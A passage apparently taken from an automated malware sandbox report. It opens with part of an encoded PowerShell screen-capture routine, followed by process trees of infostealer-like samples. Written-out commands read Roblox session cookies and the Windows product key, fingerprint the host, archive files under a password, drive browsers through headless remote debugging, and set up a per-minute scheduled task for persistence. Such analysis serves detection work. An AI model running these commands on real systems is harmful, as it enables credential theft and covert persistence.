ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        6⤵
        
        PID:7428
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2xpdbibj\2xpdbibj.cmdline"
        7⤵
        
        PID:6800
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA19A.tmp" "c:\Users\Admin\AppData\Local\Temp\2xpdbibj\CSCF8FFDB6777E0444EB2404889159FD6BA.TMP"
        8⤵
        
        PID:5900
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        
        PID:7600
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:7820
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        
        PID:8024
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:8104
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        
        PID:8160
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:6280
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        
        PID:7396
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:3448
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        
        PID:7472
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:7600
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "getmac"
        5⤵
        
        PID:7568
      - C:\Windows\system32\getmac.exe
        
        getmac
        6⤵
        
        PID:7996
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1072"
        5⤵
        
        PID:8036
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 1072
        6⤵
        Kills process with taskkill
        
        PID:3804
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4452"
        5⤵
        
        PID:7164
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4452
        6⤵
        Kills process with taskkill
        
        PID:5424
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        5⤵
        
        PID:7644
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4400
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        5⤵
        
        PID:3860
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        6⤵
        
        PID:5448
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI63482\rar.exe a -r -hp"2be58c61af4f5e935578a4c103a9265a" "C:\Users\Admin\AppData\Local\Temp\UtcSO.zip" *"
        5⤵
        
        PID:5644
      - C:\Users\Admin\AppData\Local\Temp\_MEI63482\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI63482\rar.exe a -r -hp"2be58c61af4f5e935578a4c103a9265a" "C:\Users\Admin\AppData\Local\Temp\UtcSO.zip" *
        6⤵
        
        PID:7996
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic os get Caption"
        5⤵
        
        PID:6852
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        6⤵
        
        PID:5540
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
        5⤵
        
        PID:2000
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        6⤵
        
        PID:7056
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        5⤵
        
        PID:2868
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        6⤵
        
        PID:7404
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
        5⤵
        
        PID:8044
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5448
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        5⤵
        
        PID:6540
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        6⤵
        Detects videocard installed
        
        PID:2952
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
        5⤵
        
        PID:3032
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        6⤵
        
        PID:2912
- - C:\Users\Admin\AppData\Local\Temp\a\nioxclient.exe
    "C:\Users\Admin\AppData\Local\Temp\a\nioxclient.exe"
    3⤵
    PID:2456
- - C:\Users\Admin\AppData\Local\Temp\a\cubrodriver.exe
    "C:\Users\Admin\AppData\Local\Temp\a\cubrodriver.exe"
    3⤵
    PID:6956
- - C:\Users\Admin\AppData\Local\Temp\a\ScreenConnect.ClientSetup_2.exe
    "C:\Users\Admin\AppData\Local\Temp\a\ScreenConnect.ClientSetup_2.exe"
    3⤵
    PID:7940
  - - C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\521ba1a49534efec\ScreenConnect.ClientSetup.msi"
      4⤵
      PID:7412
- - C:\Users\Admin\AppData\Local\Temp\a\capt1cha.exe
    "C:\Users\Admin\AppData\Local\Temp\a\capt1cha.exe"
    3⤵
    PID:7712
  - - C:\Windows\system32\tasklist.exe
      "tasklist"
      4⤵
      Enumerates processes with tasklist
      PID:1076
  - - C:\Windows\system32\tasklist.exe
      "tasklist"
      4⤵
      Enumerates processes with tasklist
      PID:4700
  - - C:\Windows\system32\tasklist.exe
      "tasklist"
      4⤵
      Enumerates processes with tasklist
      PID:7220
  - - C:\Windows\system32\tasklist.exe
      "tasklist"
      4⤵
      Enumerates processes with tasklist
      PID:6468
  - - C:\Windows\system32\tasklist.exe
      "tasklist"
      4⤵
      Enumerates processes with tasklist
      PID:6060
  - - C:\Windows\system32\tasklist.exe
      "tasklist"
      4⤵
      Enumerates processes with tasklist
      PID:7252
  - - C:\Windows\system32\tasklist.exe
      "tasklist"
      4⤵
      Enumerates processes with tasklist
      PID:5376
  - - C:\Windows\system32\tasklist.exe
      "tasklist"
      4⤵
      Enumerates processes with tasklist
      PID:5452
  - - C:\Windows\system32\tasklist.exe
      "tasklist"
      4⤵
      Enumerates processes with tasklist
      PID:5248
  - - C:\Windows\system32\tasklist.exe
      "tasklist"
      4⤵
      Enumerates processes with tasklist
      PID:784
  - - C:\Windows\system32\tasklist.exe
      "tasklist"
      4⤵
      Enumerates processes with tasklist
      PID:2000
  - - C:\Windows\system32\tasklist.exe
      "tasklist"
      4⤵
      Enumerates processes with tasklist
      PID:6264
  - - C:\Windows\system32\tasklist.exe
      "tasklist"
      4⤵
      Enumerates processes with tasklist
      PID:4724
  - - C:\Windows\system32\tasklist.exe
      "tasklist"
      4⤵
      Enumerates processes with tasklist
      PID:6924
  - - C:\Windows\system32\tasklist.exe
      "tasklist"
      4⤵
      Enumerates processes with tasklist
      PID:5944
  - - C:\Windows\system32\tasklist.exe
      "tasklist" /FO CSV /NH
      4⤵
      Enumerates processes with tasklist
      PID:4992
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /F /IM discord.exe
      4⤵
      Kills process with taskkill
      PID:5468
  - - C:\Windows\system32\tasklist.exe
      "tasklist" /FI "IMAGENAME eq chrome.exe"
      4⤵
      Enumerates processes with tasklist
      PID:7460
  - - C:\Windows\system32\tasklist.exe
      "tasklist" /FI "IMAGENAME eq msedge.exe"
      4⤵
      Enumerates processes with tasklist
      PID:3400
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --restore-last-session --remote-debugging-port=8385 --remote-allow-origins=* "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --profile-directory=Default --start-minimized
      4⤵
      Uses browser remote debugging
      PID:7624
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x21c,0x220,0x224,0x1f8,0x228,0x7ffe6b04cc40,0x7ffe6b04cc4c,0x7ffe6b04cc58
        5⤵
        
        PID:7328
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --use-angle=swiftshader-webgl --headless --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --field-trial-handle=1564,i,2741519644253847759,18176900010762025042,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1512 /prefetch:2
        5⤵
        
        PID:8344
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --field-trial-handle=1884,i,2741519644253847759,18176900010762025042,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1880 /prefetch:3
        5⤵
        
        PID:8488
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --headless --restore-last-session --remote-debugging-port=8878 --remote-allow-origins=* "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --profile-directory=Default --start-minimized
      4⤵
      Uses browser remote debugging
      PID:6212
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x14c,0x150,0x154,0x128,0x158,0x7ffe6aad46f8,0x7ffe6aad4708,0x7ffe6aad4718
        5⤵
        
        PID:652
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1444,15614697990317063949,6953583468714489898,131072 --disable-features=PaintHolding --headless --headless --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --override-use-software-gl-for-tests --mojo-platform-channel-handle=1504 /prefetch:2
        5⤵
        
        PID:8828
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1444,15614697990317063949,6953583468714489898,131072 --disable-features=PaintHolding --lang=en-US --service-sandbox-type=none --use-gl=swiftshader-webgl --headless --mojo-platform-channel-handle=1900 /prefetch:3
        5⤵
        
        PID:8868
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=8878 --allow-pre-commit-input --field-trial-handle=1444,15614697990317063949,6953583468714489898,131072 --disable-features=PaintHolding --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=1968 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:8668
  - - C:\Windows\system32\tasklist.exe
      "tasklist" /FI "IMAGENAME eq msedge.exe"
      4⤵
      Enumerates processes with tasklist
      PID:8840
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /F /IM msedge.exe
      4⤵
      Kills process with taskkill
      PID:1652
  - - C:\Windows\system32\tasklist.exe
      "tasklist"
      4⤵
      Enumerates processes with tasklist
      PID:5316
  - - C:\Windows\system32\tasklist.exe
      "tasklist"
      4⤵
      Enumerates processes with tasklist
      PID:1548
  - - C:\Windows\system32\tasklist.exe
      "tasklist"
      4⤵
      Enumerates processes with tasklist
      PID:8756
  - - C:\Windows\system32\tasklist.exe
      "tasklist"
      4⤵
      Enumerates processes with tasklist
      PID:4668
  - - C:\Windows\system32\tasklist.exe
      "tasklist"
      4⤵
      Enumerates processes with tasklist
      PID:9064
  - - C:\Windows\system32\tasklist.exe
      "tasklist"
      4⤵
      Enumerates processes with tasklist
      PID:8104
  - - C:\Windows\system32\tasklist.exe
      "tasklist"
      4⤵
      Enumerates processes with tasklist
      PID:8288
  - - C:\Windows\system32\tasklist.exe
      "tasklist"
      4⤵
      Enumerates processes with tasklist
      PID:6864
  - - C:\Windows\system32\tasklist.exe
      "tasklist"
      4⤵
      Enumerates processes with tasklist
      PID:2912
  - - C:\Windows\system32\tasklist.exe
      "tasklist"
      4⤵
      Enumerates processes with tasklist
      PID:6280
  - - C:\Windows\system32\tasklist.exe
      "tasklist"
      4⤵
      Enumerates processes with tasklist
      PID:8780
  - - C:\Windows\system32\tasklist.exe
      "tasklist"
      4⤵
      Enumerates processes with tasklist
      PID:8840
  - - C:\Windows\system32\tasklist.exe
      "tasklist"
      4⤵
      Enumerates processes with tasklist
      PID:9084
  - - C:\Windows\system32\tasklist.exe
      "tasklist"
      4⤵
      Enumerates processes with tasklist
      PID:4056
  - - C:\Windows\system32\tasklist.exe
      "tasklist"
      4⤵
      Enumerates processes with tasklist
      PID:8304
  - - C:\Windows\system32\hostname.exe
      "hostname"
      4⤵
      PID:8288
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic" path win32_VideoController get name /value
      4⤵
      Detects videocard installed
      PID:7320
  - - C:\Windows\system32\getmac.exe
      "getmac" /fo list /v
      4⤵
      PID:7828
  - - C:\Windows\system32\netsh.exe
      "netsh" advfirewall show allprofiles state
      4⤵
      Modifies Windows Firewall
      PID:4668
- - C:\Users\Admin\AppData\Local\Temp\a\begin.exe
    "C:\Users\Admin\AppData\Local\Temp\a\begin.exe"
    3⤵
    PID:7104
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
      4⤵
      PID:2480
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
      4⤵
      PID:7088
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
      4⤵
      PID:7684
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
      4⤵
      PID:7228
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
      4⤵
      PID:5972
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
      4⤵
      PID:7628
- - C:\Users\Admin\AppData\Local\Temp\a\XMZTSVYE_l10_wix4_dash.exe
    "C:\Users\Admin\AppData\Local\Temp\a\XMZTSVYE_l10_wix4_dash.exe"
    3⤵
    PID:7872
  - - C:\Windows\TEMP\{91F47B57-E45D-42DF-B051-EDC9646529B9}\.cr\XMZTSVYE_l10_wix4_dash.exe
      "C:\Windows\TEMP\{91F47B57-E45D-42DF-B051-EDC9646529B9}\.cr\XMZTSVYE_l10_wix4_dash.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\a\XMZTSVYE_l10_wix4_dash.exe" -burn.filehandle.attached=652 -burn.filehandle.self=648
      4⤵
      PID:6320
    - - C:\Windows\TEMP\{DAB989C3-05E5-4315-AB5A-A98805EC0E39}\.ba\Dashboard.exe
        
        C:\Windows\TEMP\{DAB989C3-05E5-4315-AB5A-A98805EC0E39}\.ba\Dashboard.exe
        5⤵
        
        PID:7356
      - C:\Users\Admin\AppData\Roaming\dqfPatch_beta\Dashboard.exe
        
        C:\Users\Admin\AppData\Roaming\dqfPatch_beta\Dashboard.exe
        6⤵
        
        PID:7968
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\SysWOW64\cmd.exe
        7⤵
        
        PID:7992
        
        C:\Users\Admin\AppData\Local\Temp\PatchHost.exe
        
        C:\Users\Admin\AppData\Local\Temp\PatchHost.exe
        8⤵
        
        PID:4428
- - C:\Users\Admin\AppData\Local\Temp\a\CalcVaults.exe
    "C:\Users\Admin\AppData\Local\Temp\a\CalcVaults.exe"
    3⤵
    PID:648
- - C:\Users\Admin\AppData\Local\Temp\a\alex12312.exe
    "C:\Users\Admin\AppData\Local\Temp\a\alex12312.exe"
    3⤵
    PID:8096
  - - C:\Users\Admin\AppData\Local\Temp\a\alex12312.exe
      "C:\Users\Admin\AppData\Local\Temp\a\alex12312.exe"
      4⤵
      PID:7672
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 8096 -s 836
      4⤵
      Program crash
      PID:7984
- - C:\Users\Admin\AppData\Local\Temp\a\gold.rim.exe
    "C:\Users\Admin\AppData\Local\Temp\a\gold.rim.exe"
    3⤵
    PID:8152
  - - C:\Users\Admin\AppData\Local\Temp\a\gold.rim.exe
      "C:\Users\Admin\AppData\Local\Temp\a\gold.rim.exe"
      4⤵
      PID:7620
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 8152 -s 836
      4⤵
      Program crash
      PID:6636
- - C:\Users\Admin\AppData\Local\Temp\a\fher.exe
    "C:\Users\Admin\AppData\Local\Temp\a\fher.exe"
    3⤵
    PID:1640
  - - C:\Users\Admin\AppData\Local\Temp\a\fher.exe
      "C:\Users\Admin\AppData\Local\Temp\a\fher.exe"
      4⤵
      PID:5020
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1640 -s 840
      4⤵
      Program crash
      PID:4808
- - C:\Users\Admin\AppData\Local\Temp\a\alex122121.exe
    "C:\Users\Admin\AppData\Local\Temp\a\alex122121.exe"
    3⤵
    PID:7468
  - - C:\Users\Admin\AppData\Local\Temp\a\alex122121.exe
      "C:\Users\Admin\AppData\Local\Temp\a\alex122121.exe"
      4⤵
      PID:8032
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7468 -s 836
      4⤵
      Program crash
      PID:3568
- - C:\Users\Admin\AppData\Local\Temp\a\cronikxqqq.exe
    "C:\Users\Admin\AppData\Local\Temp\a\cronikxqqq.exe"
    3⤵
    PID:6392
  - - C:\Users\Admin\AppData\Local\Temp\a\cronikxqqq.exe
      "C:\Users\Admin\AppData\Local\Temp\a\cronikxqqq.exe"
      4⤵
      PID:7536
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6392 -s 836
      4⤵
      Program crash
      PID:6108
- - C:\Users\Admin\AppData\Local\Temp\a\ChromeUpdate.exe
    "C:\Users\Admin\AppData\Local\Temp\a\ChromeUpdate.exe"
    3⤵
    PID:7092
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "ChromeUpdate" /tr "C:\Users\Admin\AppData\Roaming\ChromeUpdate.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:7944
- - C:\Users\Admin\AppData\Local\Temp\a\alex1213321.exe
    "C:\Users\Admin\AppData\Local\Temp\a\alex1213321.exe"
    3⤵
    PID:2988
  - - C:\Users\Admin\AppData\Local\Temp\a\alex1213321.exe
      "C:\Users\Admin\AppData\Local\Temp\a\alex1213321.exe"
      4⤵
      PID:5236
  - - C:\Users\Admin\AppData\Local\Temp\a\alex1213321.exe
      "C:\Users\Admin\AppData\Local\Temp\a\alex1213321.exe"
      4⤵
      PID:6636
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2988 -s 844
      4⤵
      Program crash
      PID:7376
- - C:\Users\Admin\AppData\Local\Temp\a\fuck122112.exe
    "C:\Users\Admin\AppData\Local\Temp\a\fuck122112.exe"
    3⤵
    PID:6420
  - - C:\Users\Admin\AppData\Local\Temp\a\fuck122112.exe
      "C:\Users\Admin\AppData\Local\Temp\a\fuck122112.exe"
      4⤵
      PID:8092
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6420 -s 816
      4⤵
      Program crash
      PID:8004
- - C:\Users\Admin\AppData\Local\Temp\a\alex12112.exe
    "C:\Users\Admin\AppData\Local\Temp\a\alex12112.exe"
    3⤵
    PID:8080
  - - C:\Users\Admin\AppData\Local\Temp\a\alex12112.exe
      "C:\Users\Admin\AppData\Local\Temp\a\alex12112.exe"
      4⤵
      PID:460
  - - C:\Users\Admin\AppData\Local\Temp\a\alex12112.exe
      "C:\Users\Admin\AppData\Local\Temp\a\alex12112.exe"
      4⤵
      PID:6924
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 8080 -s 972
      4⤵
      Program crash
      PID:7000
- - C:\Users\Admin\AppData\Local\Temp\a\alex.exe
    "C:\Users\Admin\AppData\Local\Temp\a\alex.exe"
    3⤵
    PID:2612
  - - C:\Users\Admin\AppData\Local\Temp\a\alex.exe
      "C:\Users\Admin\AppData\Local\Temp\a\alex.exe"
      4⤵
      PID:820
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2612 -s 952
      4⤵
      Program crash
      PID:440
- - C:\Users\Admin\AppData\Local\Temp\a\Lead.Upload.Report.Feb.2025.exe
    "C:\Users\Admin\AppData\Local\Temp\a\Lead.Upload.Report.Feb.2025.exe"
    3⤵
    PID:6832
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c 1.vbs && 2.xlsx
      4⤵
      PID:7644
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1.vbs"
        5⤵
        
        PID:5284
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
